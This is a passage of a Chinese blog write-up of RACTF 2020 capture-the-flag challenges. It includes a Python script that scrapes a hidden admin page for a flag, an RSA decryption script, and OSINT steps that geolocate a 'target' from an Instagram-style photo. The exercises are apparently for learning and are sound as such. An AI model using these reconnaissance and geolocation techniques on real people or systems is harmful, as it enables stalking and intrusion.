<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200610203021.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200610203021.png" class="lazyload" title></a></p>
<p>访问之后，在源代码看到一堆下面的东西。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200610203328.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200610203328.png" class="lazyload" title></a></p>
<p><a href="http://ha1c9on.top/2020/06/06/ractf-2020web-check-in/#Finding-server-information" target="_blank" rel="noopener">这里</a>说这个是Unicode编码和ascii的混合，用脚本遍历ascii，就可得到flag。</p>
<pre class="line-numbers language-python"><code class="language-python"><span class="token keyword">import</span> requests
<span class="token keyword">import</span> string
<span class="token keyword">from</span> requests<span class="token punctuation">.</span>adapters <span class="token keyword">import</span> HTTPAdapter

url<span class="token operator">=</span><span class="token string">'http://95.216.233.106:30279/__adminPortal'</span>

cookie <span class="token operator">=</span> <span class="token punctuation">{</span>
    <span class="token string">'session'</span><span class="token punctuation">:</span><span class="token string">'5d924781-f5dd-42b3-bad0-093ff15782ee'</span>
<span class="token punctuation">}</span>
s<span class="token operator">=</span>string<span class="token punctuation">.</span>printable
session <span class="token operator">=</span> requests<span class="token punctuation">.</span>session<span class="token punctuation">(</span><span class="token punctuation">)</span>
session<span class="token punctuation">.</span>mount<span class="token punctuation">(</span><span class="token string">'http://'</span><span class="token punctuation">,</span> HTTPAdapter<span class="token punctuation">(</span>max_retries<span class="token operator">=</span><span class="token number">5</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
result<span class="token operator">=</span>session<span class="token punctuation">.</span>get<span class="token punctuation">(</span>url<span class="token operator">=</span>url<span class="token punctuation">,</span>cookies<span class="token operator">=</span>cookie<span class="token punctuation">)</span><span class="token punctuation">.</span>text
data<span class="token operator">=</span>result<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">'\<\h3 style="display:none"\>'</span><span class="token punctuation">)</span>    <span class="token comment" spellcheck="true">#要去掉反斜杠</span>

<span class="token keyword">for</span> i <span class="token keyword">in</span> data<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">:</span>
    <span class="token keyword">if</span> i <span class="token keyword">in</span> s<span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span>i<span class="token punctuation">,</span>end<span class="token operator">=</span><span class="token string">''</span><span class="token punctuation">)</span>
    <span class="token keyword">else</span><span class="token punctuation">:</span>
        <span class="token keyword">pass</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200610204206.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200610204206.png" class="lazyload" title></a></p>
<h3 id="Insert-witty-name-未做出"><a href="#Insert-witty-name-未做出" class="headerlink" title="Insert witty name(未做出)"></a>Insert witty name(未做出)</h3><p>提示：Having access to the site’s source would be really useful, but we don’t know how we could get it. All we know is that the site runs python.</p>
<p>关键是python这个框架，但不熟。以如下的方式就可以得到flag，emmm，python这种见的还是少啊。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200610202642.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200610202642.png" class="lazyload" title></a></p>
<h3 id="Xtremely-Memorable-Listing"><a href="#Xtremely-Memorable-Listing" class="headerlink" title="Xtremely Memorable Listing"></a>Xtremely Memorable Listing</h3><p>提示：We’ve been asked to test a web application, and we suspect there’s a file they used to provide to search engines, but we can’t remember what it used to be called. Can you have a look and see what you can find?</p>
<p>flag为最开始在_journal.txt找到的值。</p>
<h1 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h1><h2 id="Discord"><a href="#Discord" class="headerlink" title="Discord"></a>Discord</h2><p>签到题，在Discord中找到flag</p>
<h1 id="OSINT"><a href="#OSINT" class="headerlink" title="OSINT"></a>OSINT</h1><p>这好像是个社工类型的题目类别，考察信息搜集，定位目标人员。</p>
<h2 id="RAirways"><a href="#RAirways" class="headerlink" title="RAirways"></a>RAirways</h2><p>题目：Agent. We found a target posting strange images of boarding passes to his Instagram. None of the guys at base can figure it out, but we think he’s been using the images to exfiltrate data. We’ve attached a high-quality version of the image below, here’s the one from his Instagram: </p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608100357.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608100357.png" class="lazyload" title></a></p>
<p>在上图看到了条形码，直接到<a href="https://demo.dynamsoft.com/DBR/BarcodeReaderDemo.aspx" target="_blank" rel="noopener">识别条码网站</a>，识别得到flag。</p>
<blockquote>
<p>ractf{B0ard1ngP4ssD4t4}</p>
</blockquote>
<h2 id="Remote-Retreat"><a href="#Remote-Retreat" class="headerlink" title="Remote Retreat"></a>Remote Retreat</h2><p>题目：Agent, it’s good to have you.</p>
<p>One of our targets has been constantly avoiding us, but we managed to find their private Instagram. They just posted a photo, but we can’t work out where they are. We tried to check the EXIF data, but it appears the social platform removes it automatically.</p>
<p>Let us know where he is by clicking on the map, you’ll have to be accurate to within 500 meters!</p>
<p>给出一张目标的摄影照片（如下），然后让我们去寻找目标所在地。刚开始以为挺麻烦的，在试了一会儿发现还是可以做的。</p>
<p><a href="https://cdn.jsdelivr.net/gh/crownz-sec/Blog_Source@master/img/20200608104552.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://cdn.jsdelivr.net/gh/crownz-sec/Blog_Source@master/img/20200608104552.png" class="lazyload" title></a></p>
<p>用谷歌加上图片中的关键字搜图，发现一个网址。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608103305.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608103305.png" class="lazyload" title></a></p>
<p>点进去，在第13位发现了目标地点。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608103421.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608103421.png" class="lazyload" title></a></p>
<p>进入目标地点的介绍，看到是类似于大众点评的介绍。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200610211135.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200610211135.png" class="lazyload" title></a></p>
<p>可以在左上角看到地址。点击进入谷歌地图，搜索上图中的地址，在url框看到两个东西，就猜测为地点相应经纬度，后面也证明猜想是没错的。</p>
<p><a href="https://cdn.jsdelivr.net/gh/crownz-sec/Blog_Source@master/img/20200608104755.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://cdn.jsdelivr.net/gh/crownz-sec/Blog_Source@master/img/20200608104755.png" class="lazyload" title></a></p>
<p>然后就可以拿着经纬度，去题目给的提交框提交。每次提交后，会在地图上定位到正中心的位置。每次提交后，还需要手动放大地图，直到找到相应地点提交flag。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608105520.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608105520.png" class="lazyload" title></a></p>
<h1 id="Cryptography"><a href="#Cryptography" class="headerlink" title="Cryptography"></a>Cryptography</h1><h2 id="Really-Simple-Algorithm"><a href="#Really-Simple-Algorithm" class="headerlink" title="Really Simple Algorithm"></a>Really Simple Algorithm</h2><p>题目：Challenge instance ready at <code>95.216.233.106:43859</code>.</p>
<p>nc连接上之后，发现给出p，q，e和ct，就认为是RSA了。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200607182039.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200607182039.png" class="lazyload" title></a></p>
<p>p，q是两个私钥，e是公钥，ct是密文。直接用python写出脚本，解密即可。</p>
<pre class="line-numbers language-python"><code class="language-python"><span class="token keyword">import</span> libnum

<span class="token keyword">def</span> <span class="token function">egcd</span><span class="token punctuation">(</span>a<span class="token punctuation">,</span> b<span class="token punctuation">)</span><span class="token punctuation">:</span>
    x<span class="token punctuation">,</span>y<span class="token punctuation">,</span> u<span class="token punctuation">,</span>v <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">0</span>
    <span class="token keyword">while</span> a <span class="token operator">!=</span> <span class="token number">0</span><span class="token punctuation">:</span>
        q<span class="token punctuation">,</span> r <span class="token operator">=</span> b<span class="token operator">//</span>a<span class="token punctuation">,</span> b<span class="token operator">%</span>a
        m<span class="token punctuation">,</span> n <span class="token operator">=</span> x<span class="token operator">-</span>u<span class="token operator">*</span>q<span class="token punctuation">,</span> y<span class="token operator">-</span>v<span class="token operator">*</span>q
        b<span class="token punctuation">,</span>a<span class="token punctuation">,</span> x<span class="token punctuation">,</span>y<span class="token punctuation">,</span> u<span class="token punctuation">,</span>v <span class="token operator">=</span> a<span class="token punctuation">,</span>r<span class="token punctuation">,</span> u<span class="token punctuation">,</span>v<span class="token punctuation">,</span> m<span class="token punctuation">,</span>n
        gcd <span class="token operator">=</span> b
    <span class="token keyword">return</span> gcd<span class="token punctuation">,</span> x<span class="token punctuation">,</span> y

<span class="token keyword">def</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    p<span class="token operator">=</span><span class="token number">6993365611498418289502641340524674421618810802436688610741973750021700622798246666643885969098252872456954088986333134850544202679360445912541828798563903</span>
    q<span class="token operator">=</span><span class="token number">6880339459604993627291530006650423175004242981902238126768445096491714628297578367622929482486017466042799044465060922104847767753211803296373973622478957</span>
    e<span class="token operator">=</span><span class="token number">65537</span>
    ct<span class="token operator">=</span><span class="token number">36553323666123409329155619944166455541459939040873892318801454187334745671791946750332229307780406214918996738766799528473970188273718491074234783333556074303190986720797899225926910140495266799687661066113156984532381641620498540793824063777475356973614158626705646554527705777303415419332356169816444961588</span>
    <span class="token comment" spellcheck="true"># compute n</span>
    n <span class="token operator">=</span> p <span class="token operator">*</span> q

    <span class="token comment" spellcheck="true"># Compute phi(n)</span>
    phi <span class="token operator">=</span> <span class="token punctuation">(</span>p <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">)</span> <span class="token operator">*</span> <span class="token punctuation">(</span>q <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">)</span>

    <span class="token comment" spellcheck="true"># Compute modular inverse of e</span>
    gcd<span class="token punctuation">,</span> a<span class="token punctuation">,</span> b <span class="token operator">=</span> egcd<span class="token punctuation">(</span>e<span class="token punctuation">,</span> phi<span class="token punctuation">)</span>
    d <span class="token operator">=</span> a
    <span class="token keyword">print</span><span class="token punctuation">(</span> <span class="token string">"n:  "</span> <span class="token operator">+</span> str<span class="token punctuation">(</span>d<span class="token punctuation">)</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token comment" spellcheck="true"># Decrypt ciphertext</span>
    pt <span class="token operator">=</span> pow<span class="token punctuation">(</span>ct<span class="token punctuation">,</span> d<span class="token punctuation">,</span> n<span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span> <span class="token string">"pt: "</span> <span class="token operator">+</span> str<span class="token punctuation">(</span>pt<span class="token punctuation">)</span> <span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>libnum<span class="token punctuation">.</span>n2s<span class="token punctuation">(</span>pt<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">"__main__"</span><span class="token punctuation">:</span>
    main<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><!--等结束在看其他人的wp，发现一些东西并不难，只是自己想复杂了，或者说根本不知道一些简单的东西。就想那个SQL注入，根本不需要盲注的，根据爆出的语句结构进行构造就行了，可能是最近练习盲注脚本上头了，2333，也得感谢周兄的看了几下题，帮我往这条路上引了。最后是弄了很久盲注，练习下也没什么不好。那个flask的PIN码问题也没考，但为什么要给那个页面，很误导人。还有一些简单的知识也得了解清楚啊，不然总走歪了。这个CTF不难，但是挺有意思的，循序渐进，而且不是PHP搭的页面。这次CTF应当是体验最好的一次了，想了很多东西，也学了一些东西，很不错。打CTF的确是要静下心来，仔细的去思考。-->

<blockquote>
<p>参考</p>
<p>[1] <a href="https://elnath.io/category/web/" target="_blank" rel="noopener">Elnath-Web</a></p>
<p>[2] <a href="http://ha1c9on.top/2020/06/06/ractf-2020web-check-in/#Finding-server-information" target="_blank" rel="noopener">[RACTF 2020]Write-Up</a></p>
</blockquote>
</body></html></div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">crownZ</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://crownz-sec.github.io/2020/06/07/RACTF2020/">https://crownz-sec.github.io/2020/06/07/RACTF2020/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://crownz-sec.github.io">crownZ's Blog</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计    </a><a class="post-meta__tags" href="/tags/Nodejs/">Nodejs    </a><a class="post-meta__tags" href="/tags/Flask/">Flask    </a><a class="post-meta__tags" href="/tags/Python/">Python    </a><a class="post-meta__tags" href="/tags/SQL%E6%B3%A8%E5%85%A5/">SQL注入    </a></div><div class="post_share"></div></div><nav class="pagination_post" id="pagination"><div class="prev-post pull_left"><a href="/2020/06/09/vulnhub_DC3/"><img class="prev_cover lazyload" data-src="https://cdn.jsdelivr.net/gh/crownz-sec/Blog_Source@master/img/20200116112234.png" onerror="onerror=null;src='/img/404.jpg'"><div class="label">上一篇</div><div class="prev_info"><span>vulnhub-DC3</span></div></a></div><div class="next-post pull_right"><a href="/2020/05/26/GKCTF2020/"><img class="next_cover lazyload" data-src="https://gitee.com/crownz/blog_image/raw/master/20200623141151.png" onerror="onerror=null;src='/img/404.jpg'"><div class="label">下一篇</div><div class="next_info"><span>GKCTF学习</span></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fa fa-fw fa-thumbs-up" aria-hidden="true"></i><span> 相关推荐</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/2020/05/26/GKCTF2020/" title="GKCTF学习"><img class="relatedPosts_cover lazyload"data-src="https://gitee.com/crownz/blog_image/raw/master/20200623141151.png"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-05-26</div><div class="relatedPosts_title">GKCTF学习</div></div></a></div><div class="relatedPosts_item"><a href="/2020/05/09/Ethernaut/" title="智能合约入门游戏——Ethernaut"><img class="relatedPosts_cover lazyload"data-src="https://gitee.com/crownZ/blog_image/raw/master/20200509194026.png"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-05-09</div><div class="relatedPosts_title">智能合约入门游戏——Ethernaut</div></div></a></div><div class="relatedPosts_item"><a href="/2020/02/17/php_pop/" title="PHP反序列化漏洞与POP链的构造"><img class="relatedPosts_cover lazyload"data-src="https://cdn.jsdelivr.net/gh/crownz-sec/Blog_Source@master/img/20200217200117.png"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-02-17</div><div class="relatedPosts_title">PHP反序列化漏洞与POP链的构造</div></div></a></div></div><div class="clear_both"></div></div><hr><div id="post-comment"><div class="comment_headling"><i class="fa fa-comments fa-fw" aria-hidden="true"></i><span> 评论</span></div><div class="vcomment" id="vcomment"></div><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = false == true ? true : false;
var verify = false == true ? true : false;
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;

window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  appId:'jALuqrrccTRxjAMC17xGE0Nu-gzGzoHsz',
  appKey:'pbX3djxpUh6D9M8yY3iARsbk',
  placeholder:'Please leave your footprints',
  avatar:'mp',
  guest_info:guest_info,
  pageSize:'10',
  lang:'zh-cn',
  recordIP: true
});</script></div><!--添加音频--></div></main><footer id="footer" data-type="color"><div id="footer-wrap"><div class="copyright">&copy;2020 By crownZ</div><div class="framework-info"><span>驱动 </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 </span><a href="https://github.com/jerryc127/hexo-theme-butterfly" target="_blank" rel="noopener"><span>Butterfly</span></a></div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="阅读模式"></i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="简繁转换" target="_self">繁</a><i class="darkmode fa fa-moon-o" id="darkmode" title="夜间模式"></i></div><div id="rightside-config-show"><div id="rightside_config" title="设置"><i class="fa fa-cog" aria-hidden="true"></i></div><a id="to_comment" href="#post-comment" title="直达评论"><i class="scroll_to_comment fa fa-comments">  </i></a><i class="fa fa-list-ul close" id="mobile-toc-button" title="目录" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="回到顶部" aria-hidden="true"></i></div></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script id="ribbon_piao" mobile="false" src="https://cdn.jsdelivr.net/gh/jerryc127/butterfly_cdn@2.1.0/js/piao.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@latest/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/lazysizes@latest/lazysizes.min.js" async=""></script></body></html>